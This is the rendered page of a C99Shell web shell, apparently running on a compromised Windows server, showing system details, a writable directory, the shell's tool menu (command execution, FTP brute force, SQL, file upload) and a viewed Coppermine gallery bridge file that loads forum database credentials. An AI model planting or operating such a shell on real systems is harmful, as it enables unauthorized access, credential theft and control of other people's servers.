!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

C:\AmbienteBogota\cpg1418\bridge\   drwxrwxrwx
Free 4.11 GB of 39.52 GB (10.39%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     invisionboard20.inc.php (4.55 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
/*************************
  Coppermine Photo Gallery
  ************************
  Copyright (c) 2003-2008 Dev Team
  v1.1 originally written by Gregory DEMAR

  This program is free software; you can redistribute it and/or modify
  it under the terms of the GNU General Public License version 3
  as published by the Free Software Foundation.
  
  ********************************************
  Coppermine version: 1.4.18
  $HeadURL: https://coppermine.svn.sourceforge.net/svnroot/coppermine/trunk/cpg1.4.x/bridge/invisionboard20.inc.php $
  $Revision: 4380 $
  $Author: gaugau $
  $Date: 2008-04-12 12:00:19 +0200 (Sa, 12 Apr 2008) $
**********************************************/

if (!defined('IN_COPPERMINE')) die('Not in Coppermine...');

// Switch that allows overriding the bridge manager with hard-coded values
define('USE_BRIDGEMGR'1);

require_once 
'bridge/udb_base.inc.php';

class 
cpg_udb extends core_udb {

    function 
cpg_udb()
    {
        global 
$BRIDGE;
        
        if (!
USE_BRIDGEMGR) {
            
$this->boardurl 'http://localhost/ipb';
            require_once(
'../ipb/conf_global.php');
            
$this->use_post_based_groups 0;
        } else {
            require_once(
$BRIDGE['relative_path_to_config_file'] . '/conf_global.php');
            
$this->boardurl $INFO['board_url'];
            
$this->use_post_based_groups $BRIDGE['use_post_based_groups'];
        }
        
        
// Database connection settings
        
$this->db = array(
            
'name' => $INFO['sql_database'],
            
'host' => $INFO['sql_host'] ? $INFO['sql_host'] : 'localhost',
            
'user' => $INFO['sql_user']    ,
            
'password' => $INFO['sql_pass'],
            
'prefix' =>$INFO['sql_tbl_prefix']
        );
        
        
// Board table names
        
$this->table = array(
            
'users' => 'members',
            
'groups' => 'groups',
            
'sessions' => 'sessions'
        
);

        
// Derived full table names
        
$this->usertable '`' $this->db['name'] . '`.' $this->db['prefix'] . $this->table['users'];
        
$this->groupstable =  '`' $this->db['name'] . '`.' $this->db['prefix'] . $this->table['groups'];
        
$this->sessionstable =  '`' $this->db['name'] . '`.' $this->db['prefix'] . $this->table['sessions'];
        
        
// Table field names
        
$this->field = array(
            
'username' => 'name'// name of 'username' field in users table
            
'user_id' => 'id'// name of 'id' field in users table
            
'password' => 'member_login_key'// name of 'password' field in users table
            
'email' => 'email'// name of 'email' field in users table
            
'regdate' => 'joined'// name of 'registered' field in users table
            
'location' => "''"// name of 'location' field in users table
            
'website' => "''"// name of 'website' field in users table
            
'usertbl_group_id' => 'mgroup'// name of 'group id' field in users table
            
'grouptbl_group_id' => 'g_id'// name of 'group id' field in groups table
            
'grouptbl_group_name' => 'g_title' // name of 'group name' field in groups table
        
);
        
        
// Pages to redirect to
        
$this->page = array(
            
'register' => '/index.php?act=Reg&CODE=00',
            
'editusers' => '/admin.php',
            
'edituserprofile' => '/index.php?showuser='
        
);
    
    
        
// Group ids - admin and guest only.
        
$this->admingroups = array($INFO['admin_group']);
        
$this->guestgroup $this->use_post_based_groups $INFO['guest_group']+100 3;
        
        
// Connect to db
        
$this->connect();
    }

    
// definition of how to extract id, pass from session cookie
    
function session_extraction()
    {
        if (isset(
$_COOKIE['session_id'])) {
            
$session_id addslashes($_COOKIE['session_id']);

            
$sql "SELECT member_id , member_login_key FROM {$this->sessionstable} AS s INNER JOIN {$this->usertable} AS u ON s.member_id = u.id WHERE s.id = '$session_id'";
            
            
$result cpg_db_query($sql$this->link_id);
            
            if (
mysql_num_rows($result)){
                
$row mysql_fetch_array($result);
                return 
$row;
            }
        } else {
            return 
false;
        }
    }
    
    
// definition of how to extract an id and password hash from a cookie
    
function cookie_extraction()
    {
        
$id 0;
        
$pass '';
        
        if (isset(
$_COOKIE['member_id']) && isset($_COOKIE['pass_hash'])) {
            
$id = (int)$_COOKIE['member_id'];
            
$pass substr(addslashes($_COOKIE['pass_hash']), 032);
        }

        return (
$id) ? array($id$pass) : false;
    }
    
    
// definition of actions required to convert a password from user database form to cookie form
    
function udb_hash_db($password)
    {
        return 
$password// unused
    
}
    
    function 
login_page()
    {
        
$this->redirect("/index.php?act=Login&CODE=00");
    }

    function 
logout_page()
    {
        
$this->redirect("/index.php?act=Login&CODE=03");
    }
}

// and go !
$cpg_udb = new cpg_udb;




:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0156 ]--